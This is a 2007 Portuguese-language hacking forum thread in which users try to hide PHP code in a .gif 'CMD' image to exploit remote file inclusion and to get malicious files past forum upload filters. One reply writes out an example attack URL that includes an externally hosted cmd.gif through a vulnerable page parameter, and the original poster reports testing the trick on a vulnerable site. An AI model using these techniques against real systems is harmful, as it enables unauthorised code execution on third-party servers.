Title: [AJUDA] Imagens Dinamicas
Post by: CripToGraFado on 05 de March , 2007, 01:47:27 AM
Post by: CripToGraFado on 05 de March , 2007, 01:47:27 AM
E aew Darkers,
Eu to precisando de uma ajuda de vocês... To querendo fazer uma imagem que executa um codigo php...
Tipo, tem aqueles CMD em formato de imagem (CMD.gif). É dessas que eu to querendo fazer....
Eu consegui fazer mais soh pega em HTML. PHP não.
Se alguem poder me ajudar...
Agradeço desde já !
Falow!
Eu to precisando de uma ajuda de vocês... To querendo fazer uma imagem que executa um codigo php...
Tipo, tem aqueles CMD em formato de imagem (CMD.gif). É dessas que eu to querendo fazer....
Eu consegui fazer mais soh pega em HTML. PHP não.
Se alguem poder me ajudar...
Agradeço desde já !
Falow!
Title: Re: [AJUDA] Imagens Dinamicas
Post by: Magrinho Loko on 05 de March , 2007, 03:16:03 PM
Post by: Magrinho Loko on 05 de March , 2007, 03:16:03 PM
Cara, eu to na mesma busca que você. A unica coisa que consegui foi isso:
http://www.awsystem.com.br/vtutoriais/f ... works.html (http://www.awsystem.com.br/vtutoriais/fireworks/fireworks.html)
http://www.awsystem.com.br/vtutoriais/f ... works.html (http://www.awsystem.com.br/vtutoriais/fireworks/fireworks.html)
Title: Re: [AJUDA] Imagens Dinamicas
Post by: Magrinho Loko on 05 de March , 2007, 03:25:38 PM
Post by: Magrinho Loko on 05 de March , 2007, 03:25:38 PM
Desculpe pelo Double Post, mas só veio isso à minha mente agora.
Essas CMD são arquivos texto salvos como arquivos .gif. Nada muito complexo. O unico problema é que se você for fazer um upload desta "imagem" para um fórum/site, ele será, em 99% dos casos, recusado. =/
Continuarei na busca, para ver se acho algo que é de interesse dos 2. =]
Essas CMD são arquivos texto salvos como arquivos .gif. Nada muito complexo. O unico problema é que se você for fazer um upload desta "imagem" para um fórum/site, ele será, em 99% dos casos, recusado. =/
Continuarei na busca, para ver se acho algo que é de interesse dos 2. =]
Title: Re: [AJUDA] Imagens Dinamicas
Post by: CripToGraFado on 05 de March , 2007, 03:54:21 PM
Post by: CripToGraFado on 05 de March , 2007, 03:54:21 PM
Quote from: "Magrinho Loko"Desculpe pelo Double Post, mas só veio isso à minha mente agora.
Essas CMD são arquivos texto salvos como arquivos .gif. Nada muito complexo. O unico problema é que se você for fazer um upload desta "imagem" para um fórum/site, ele será, em 99% dos casos, recusado. =/
Continuarei na busca, para ver se acho algo que é de interesse dos 2. =]
Foi assim que eu consegui fazer uma.. Mais ela não funcionou em php :)
Title: Re: [AJUDA] Imagens Dinamicas
Post by: Anonymous on 06 de March , 2007, 02:56:48 AM
Post by: Anonymous on 06 de March , 2007, 02:56:48 AM
Seis tao tentando fazer uma CMD daquelas do bug file inclusion do php?Se for isso é simples...
Title: Re: [AJUDA] Imagens Dinamicas
Post by: Magrinho Loko on 06 de March , 2007, 04:16:45 PM
Post by: Magrinho Loko on 06 de March , 2007, 04:16:45 PM
@Sonic: Eu não sei o caso dele, mas no meu caso, eu quero fazer um arquivo que passe no upload de fórums IPB como imagem png só que com um code malicioso junto.
Já tentei algumas coisas, mas tudo em vão. =/
E essas CMD's o truque é apenas salvar o arquivo com extensão .gif. =]
Já tentei algumas coisas, mas tudo em vão. =/
E essas CMD's o truque é apenas salvar o arquivo com extensão .gif. =]
Title: Re: [AJUDA] Imagens Dinamicas
Post by: CripToGraFado on 06 de March , 2007, 06:31:22 PM
Post by: CripToGraFado on 06 de March , 2007, 06:31:22 PM
Quote from: "Magrinho Loko"@Sonic: Eu não sei o caso dele, mas no meu caso, eu quero fazer um arquivo que passe no upload de fórums IPB como imagem png só que com um code malicioso junto.
Já tentei algumas coisas, mas tudo em vão. =/
E essas CMD's o truque é apenas salvar o arquivo com extensão .gif. =]
É a mesma coisa que eu quero!! =]
Title: Re: [AJUDA] Imagens Dinamicas
Post by: branco on 06 de March , 2007, 08:20:53 PM
Post by: branco on 06 de March , 2007, 08:20:53 PM
bom amigos, quando utilizamos uma cmd em gif é diferente, porque estamos passando o conteudo da imagem como referencia à pagina do site, por exemplo
www.site.com.br/index.php?inc=www.nersh ... om/cmd.gif (http://www.site.com.br/index.php?inc=www.nershess.orgfree.com/cmd.gif)?
isso faria com que a imagem que está hospedada em www.nershess.orgfree.com/cmd.gif (http://www.nershess.orgfree.com/cmd.gif) fosse passada como referencia à pagina index.php, ela vai ler o conteudo dessa imagem.
no caso dos foruns, creio que essa vulnerabilidade já foi concertada a cerca de um ano, a muito tempo atraz tentei passar essas imagems por email, fazendo com que quando o email fosse aberto executasse a foto que teria um script malicioso, porem foi em vão porque o hotmail não é vulneravel...creio que eles filtram o codigo de fonte da imagem, talvez não seja tão dificil fazer a imagem ficar em harmonia com o codigo malicioso para os servidores não repararem que existe algum codigo nela, porem tambem não deve ser tao facil porque se nao ja teriam feito isso...
desculpem não poder ajudar, nunca estudei mais a fundo esse assunto
até mais
www.site.com.br/index.php?inc=www.nersh ... om/cmd.gif (http://www.site.com.br/index.php?inc=www.nershess.orgfree.com/cmd.gif)?
isso faria com que a imagem que está hospedada em www.nershess.orgfree.com/cmd.gif (http://www.nershess.orgfree.com/cmd.gif) fosse passada como referencia à pagina index.php, ela vai ler o conteudo dessa imagem.
no caso dos foruns, creio que essa vulnerabilidade já foi concertada a cerca de um ano, a muito tempo atraz tentei passar essas imagems por email, fazendo com que quando o email fosse aberto executasse a foto que teria um script malicioso, porem foi em vão porque o hotmail não é vulneravel...creio que eles filtram o codigo de fonte da imagem, talvez não seja tão dificil fazer a imagem ficar em harmonia com o codigo malicioso para os servidores não repararem que existe algum codigo nela, porem tambem não deve ser tao facil porque se nao ja teriam feito isso...
desculpem não poder ajudar, nunca estudei mais a fundo esse assunto
até mais
Title: Re: [AJUDA] Imagens Dinamicas
Post by: Magrinho Loko on 08 de March , 2007, 06:47:55 PM
Post by: Magrinho Loko on 08 de March , 2007, 06:47:55 PM
Parece que alguem ouviu nossas preces. =]
http://www.darkers.com.br/forum/http:// ... 025#p17025 (http://www.darkers.com.br/forum/http://www.darkers.com.br/phpBB3/viewtopic.php?p=17025#p17025)
Agora só temos de correr atras do dito-cujo.
http://www.darkers.com.br/forum/http:// ... 025#p17025 (http://www.darkers.com.br/forum/http://www.darkers.com.br/phpBB3/viewtopic.php?p=17025#p17025)
Agora só temos de correr atras do dito-cujo.
Title: Re: [AJUDA] Imagens Dinamicas
Post by: CripToGraFado on 11 de March , 2007, 02:02:28 PM
Post by: CripToGraFado on 11 de March , 2007, 02:02:28 PM
Pow gente,
Consegui fazer oq eu queria. Somente peguei um arquivo e coloquei a extensão .gif =/
Eu foi no Bloco de Notas, e coloquei assim:
Salvei em teste.gif.
Depois eu tentei abrir no navedor mais não pego
Então tive a ideia de testar em um site vul. a PHP Injection.. Ai incrivelmente funciono... =]
Aconteceu do mesmo jeito que o Insanity falou.
É isso ai gente, valew pela ajuda!
flw
Consegui fazer oq eu queria. Somente peguei um arquivo e coloquei a extensão .gif =/
Eu foi no Bloco de Notas, e coloquei assim:
Code Select
<?php
echo "funcionando";
?>
Salvei em teste.gif.
Depois eu tentei abrir no navedor mais não pego
Então tive a ideia de testar em um site vul. a PHP Injection.. Ai incrivelmente funciono... =]
Aconteceu do mesmo jeito que o Insanity falou.
É isso ai gente, valew pela ajuda!
flw
Title: Re: [AJUDA] Imagens Dinamicas
Post by: CripToGraFado on 11 de March , 2007, 02:04:39 PM
Post by: CripToGraFado on 11 de March , 2007, 02:04:39 PM
Corrigindo: Quem falou isso foi o Branco 
Title: Re: [AJUDA] Imagens Dinamicas
Post by: Magrinho Loko on 13 de March , 2007, 07:03:30 PM
Post by: Magrinho Loko on 13 de March , 2007, 07:03:30 PM
@CripToGraFado:
Sim isso vai ocorrer, pq o site com php injection vai executar o arquivo que vc salvou no navegador. Esse é o mesmo principio das CMD's como arquivos .gif.
Oq eu quero é um arquivo .gif que passei nos uploads de alguns fóruns na web e que quando seja executado ative o code que está embutido na imagem.
Tente upar em algum forum IPB e veja oq ocorre, o arquivo é recusado.
Sim isso vai ocorrer, pq o site com php injection vai executar o arquivo que vc salvou no navegador. Esse é o mesmo principio das CMD's como arquivos .gif.
Oq eu quero é um arquivo .gif que passei nos uploads de alguns fóruns na web e que quando seja executado ative o code que está embutido na imagem.
Tente upar em algum forum IPB e veja oq ocorre, o arquivo é recusado.
Title: Re: [AJUDA] Imagens Dinamicas
Post by: CripToGraFado on 14 de March , 2007, 03:03:41 PM
Post by: CripToGraFado on 14 de March , 2007, 03:03:41 PM
Quote from: "Magrinho Loko"@CripToGraFado:
Sim isso vai ocorrer, pq o site com php injection vai executar o arquivo que vc salvou no navegador. Esse é o mesmo principio das CMD's como arquivos .gif.
Oq eu quero é um arquivo .gif que passei nos uploads de alguns fóruns na web e que quando seja executado ative o code que está embutido na imagem.
Tente upar em algum forum IPB e veja oq ocorre, o arquivo é recusado.
Poisé... deu isso aqui tambem... É a mesma coisa q eu quero fazer, mais eu jah vi q nao da...
Eu tentei upar no imagenshack.us e nao deu! :|
flw
se achar a solução me avisa!